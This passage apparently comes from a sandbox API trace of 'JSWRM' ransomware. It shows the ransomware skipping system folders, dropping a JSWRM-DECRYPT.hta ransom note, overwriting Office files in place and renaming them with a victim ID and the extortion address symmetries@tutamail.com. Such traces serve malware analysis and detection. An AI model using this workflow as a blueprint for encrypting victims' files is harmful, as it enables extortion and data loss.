(lpString1="1033", lpString2="$RECYCLE.BIN") returned 1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="system volume information") returned -1 [0113.526] lstrcmpiW (lpString1="1033", lpString2="msocache") returned -1 [0113.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2095a8 [0113.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0113.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0113.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.526] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b1f0 [0113.526] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.526] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jswrm-decrypt.hta")) returned 0xffffffff [0113.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0113.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.527] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0113.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x205850 [0113.527] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0113.527] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24c1d0 [0113.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0113.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.528] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b830 [0113.528] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.528] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0113.529] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.529] WriteFile (in: hFile=0x45c, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0113.530] CloseHandle (hObject=0x45c) returned 1 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b830 | out: hHeap=0x1e0000) returned 1 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209530 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224aa8 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x24b1f0 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224aa8 | out: hHeap=0x1e0000) returned 1 [0113.530] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\jswrm-decrypt.hta")) returned 0x20 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b1f0 | out: hHeap=0x1e0000) returned 1 [0113.530] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209530 | out: hHeap=0x1e0000) returned 1 [0113.530] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224dd8 [0113.530] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a54d930, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName=".", cAlternateFileName="")) returned 0x231ac0 [0113.531] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0113.531] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc4d9058b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x3b93a5c4, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3a54d930, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="..", cAlternateFileName="")) returned 1 [0113.532] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0113.532] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0113.532] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x996d62b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x996d62b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xa3dba42, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x79000, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACCESS12.ACC", cAlternateFileName="")) returned 1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2=".") returned 1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="..") returned 1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="...") returned 1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="windows") returned -1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="recovery") returned -1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="perflogs") returned -1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="documents and settings") returned -1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="$RECYCLE.BIN") returned 1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="system volume information") returned -1 [0113.532] lstrcmpiW (lpString1="ACCESS12.ACC", lpString2="msocache") returned -1 [0113.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCESS12.ACC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCESS12.ACC", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCESS12.ACC", lpUsedDefaultChar=0x0) returned 12 [0113.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0113.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCESS12.ACC", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCESS12.ACC", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCESS12.ACC", lpUsedDefaultChar=0x0) returned 12 [0113.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0113.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0113.532] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224dd8 | out: hHeap=0x1e0000) returned 1 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.532] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.532] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0113.532] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\access12.acc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.533] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=495616) returned 1 [0113.533] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.533] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.533] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.547] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.547] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.548] CloseHandle (hObject=0x238) returned 1 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0113.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3c0 [0113.548] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3c0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3c0 | out: hHeap=0x1e0000) returned 1 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0113.548] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.548] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0113.549] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.549] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.549] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACCESS12.ACC" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\access12.acc"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACCESS12.ACC.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\access12.acc.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0113.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0113.550] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf18d33e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf18d33e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf18d33e2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x3aa0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACCOLKI.DLL", cAlternateFileName="")) returned 1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2=".") returned 1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="..") returned 1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="...") returned 1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="windows") returned -1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="recovery") returned -1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="perflogs") returned -1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="documents and settings") returned -1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="$RECYCLE.BIN") returned 1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="system volume information") returned -1 [0113.550] lstrcmpiW (lpString1="ACCOLKI.DLL", lpString2="msocache") returned -1 [0113.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0113.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLKI.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLKI.DLL", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCOLKI.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.550] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0113.550] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0113.550] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLKI.DLL", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACCOLKI.DLL", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACCOLKI.DLL", lpUsedDefaultChar=0x0) returned 11 [0113.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0113.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0113.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0113.551] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x98fae45, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x98fae45, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x996d62b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x53de0, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ACTIP10.HLP", cAlternateFileName="")) returned 1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2=".") returned 1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="..") returned 1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="...") returned 1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="windows") returned -1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="recovery") returned -1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="perflogs") returned -1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="documents and settings") returned -1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="$RECYCLE.BIN") returned 1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="system volume information") returned -1 [0113.551] lstrcmpiW (lpString1="ACTIP10.HLP", lpString2="msocache") returned -1 [0113.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIP10.HLP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIP10.HLP", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIP10.HLP", lpUsedDefaultChar=0x0) returned 11 [0113.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0113.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIP10.HLP", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ACTIP10.HLP", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ACTIP10.HLP", lpUsedDefaultChar=0x0) returned 11 [0113.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0113.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0113.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0113.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\actip10.hlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.552] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=343520) returned 1 [0113.552] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.552] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.552] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.564] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.564] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.565] CloseHandle (hObject=0x238) returned 1 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0113.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0113.568] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0113.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0113.568] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0113.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0113.568] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.568] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACTIP10.HLP" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\actip10.hlp"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\ACTIP10.HLP.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\actip10.hlp.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0113.569] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0113.569] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf4cfac8a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf4cfac8a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x99dfc61, 